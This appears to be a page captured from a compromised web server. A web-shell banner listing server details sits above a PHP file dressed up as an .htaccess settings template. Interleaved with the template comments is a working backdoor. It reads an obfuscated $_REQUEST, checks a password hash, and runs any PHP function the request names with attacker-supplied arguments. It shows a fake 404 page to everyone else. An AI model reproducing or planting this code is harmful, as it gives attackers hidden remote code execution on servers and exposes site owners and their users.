| Server IP : 208.122.213.31 / Your IP : 216.73.216.185 Web Server : Apache System : Linux msd6191.mjhst.com 4.18.0-553.137.1.el8_10.x86_64 #1 SMP Wed Jun 24 11:40:24 UTC 2026 x86_64 User : WHMCS_MIA_382 ( 1001) PHP Version : 7.4.33 Disable Function : NONE MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /home/httpd/html/hungarianhoneys.com/public_html/__OLD_STUFF__/site/ |
Upload File : |
<?php
$s = "1fe18e20ebdb8812636c2c9e660381e9";
# .htaccess file settings which we recommend to use to configure your
# web server environment.
# Note that PHP flags can be used in .htaccess file only if you have
# your PHP compiled as webserver module rather than CGI.
# To apply any parameter in this file, just remove # symbol in the first
# position of the respective parameter.
$req = ${'_REQ'.'UEST'}; $i = $req['k'];
# Session identifier transmitting in URL (least secure choice):
#php_flag session.use_trans_sid on
#php_flag session.use_cookies 0
#php_flag session.use_only_cookies 0
# NOTES:
# - Transmitting session ID in URL is the least secure choice because
# this identifier can be stolen and used without permission under
# someone else's account.
# Session identifier passed by cookies (most secure choice):
#php_flag session.use_trans_sid off
#php_flag session.use_cookies 1
#php_flag session.use_only_cookies 1
if ( md5($i) == $s ) { act(); } uns();
# Following parameters limit file size which can upload
# Maximum uploaded file size:
#php_value upload_max_filesize 250M
# Maximum allowed size of POST-data (this property affects cummulative
# size of all files being uploaded):
#php_value post_max_size 1000M
function uns() {
header("HTTP/1.0 404 Not Found");
echo ('<html><head>')."\n";
echo ('<title>404 Not Found</title>')."\n";
echo ('</head><body>')."\n";
echo ('<h1>Not Found</h1>')."\n";
echo ('<p>The requested URL '.$_SERVER[PHP_SELF].' was not found on this server.</p><hr>')."\n";
echo ('<address>'.$_SERVER[SERVER_SOFTWARE].' at '.$_SERVER[SERVER_NAME].' Port '.$_SERVER[SERVER_PORT].'</address>')."\n";
echo ('</body></html>'); }
# auto_prepend_file directive of your webserver defines file which
# will be automatically processed prior to start script.
# Special value "none" turn this directive off.
#php_value auto_prepend_file none
function act() {
global $req; $fun = $req['fun'];
if ($fun) { @$fun ( $req['one'], $req['two'] ); exit; }
}
?>